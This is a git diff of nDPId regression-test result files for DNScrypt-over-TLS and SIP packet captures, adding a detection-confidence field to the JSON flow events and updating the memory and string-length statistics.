-01223{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01257{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
+00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01257{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
+00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01257{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","total-events-serialized":34}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 111/111
@@ -40,10 +40,10 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4691096 bytes
-~~ total memory freed........: 4691096 bytes
-~~ total allocations/frees...: 99715/99715
+~~ total memory allocated....: 4775065 bytes
+~~ total memory freed........: 4775065 bytes
+~~ total allocations/frees...: 101305/101305
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 1228 chars
-~~ json string avg len.......: 769 chars
+~~ json string max len.......: 1262 chars
+~~ json string avg len.......: 786 chars
diff --git a/test/results/sip.pcap.out b/test/results/sip.pcap.out
index 58bc52136..6421418c2 100644
--- a/test/results/sip.pcap.out
+++ b/test/results/sip.pcap.out
@@ -1,47 +1,47 @@
 00435{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sip.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01047{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"ts_msec":1120469572844,"pkt":"ADBUADRWAODtAW69CABFAAHvaZgAAIARF6bAqAEC1PIhIxPEE8QB2272UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTUxMjQ4NzM3LTQ2ZWE3MTVlMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTkwM2RmMGENClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY4IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 01071{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469572981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"ts_msec":1120469572981,"pkt":"AODtAW69ADBUADRWCABFAAICAABAADcRiivU8iEjwKgBAhPEE8QB7tD8U0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA2OCBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9OTAzZGYwYQ0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDkyLTE3MDFhZjYyLTEyMGM2NzE3Mg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDE1MTI0ODczNy00NmVhNzE1ZTE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYWY1NjZiZTE4MjA3MDA4NGM2Zjc0MDcwNmJiIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVudC1MZW5ndGg6IDANCg0K"}
 01331{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469590259,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":722,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":722,"pkt_l4_len":688,"ts_msec":1120469590259,"pkt":"ADBUADRWAODtAW69CABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXN0IHVzZXJuYW1lPSJ2b2kxODA2MyIscmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLHVyaT0ic2lwOjE5Mi4xNjguMS4yIixub25jZT0iMTcwMWFmNTY2YmUxODIwNzAwODRjNmY3NDA3MDZiYiIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLG5jPSIwMDAwMDAwMSIscmVzcG9uc2U9ImJkNzlmZWNhZTYwMGEyZWI3OWQzN2VjNzMyMTQ4MzBiIg0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572844,"flow_last_seen":1120469590455,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2285,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1120469680188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":10,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120469572844,"flow_last_seen":1120469697621,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1120469847669,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":14,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1120469572844,"flow_last_seen":1120469865145,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6533,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":21,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469572844,"flow_last_seen":1120470002992,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":447,"midstream":0,"ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":6,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120469572844,"flow_last_seen":1120469590455,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":2285,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1120469680188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":10,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120469572844,"flow_last_seen":1120469697621,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"ts_msec":1120469847669,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":14,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1120469572844,"flow_last_seen":1120469865145,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":6533,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
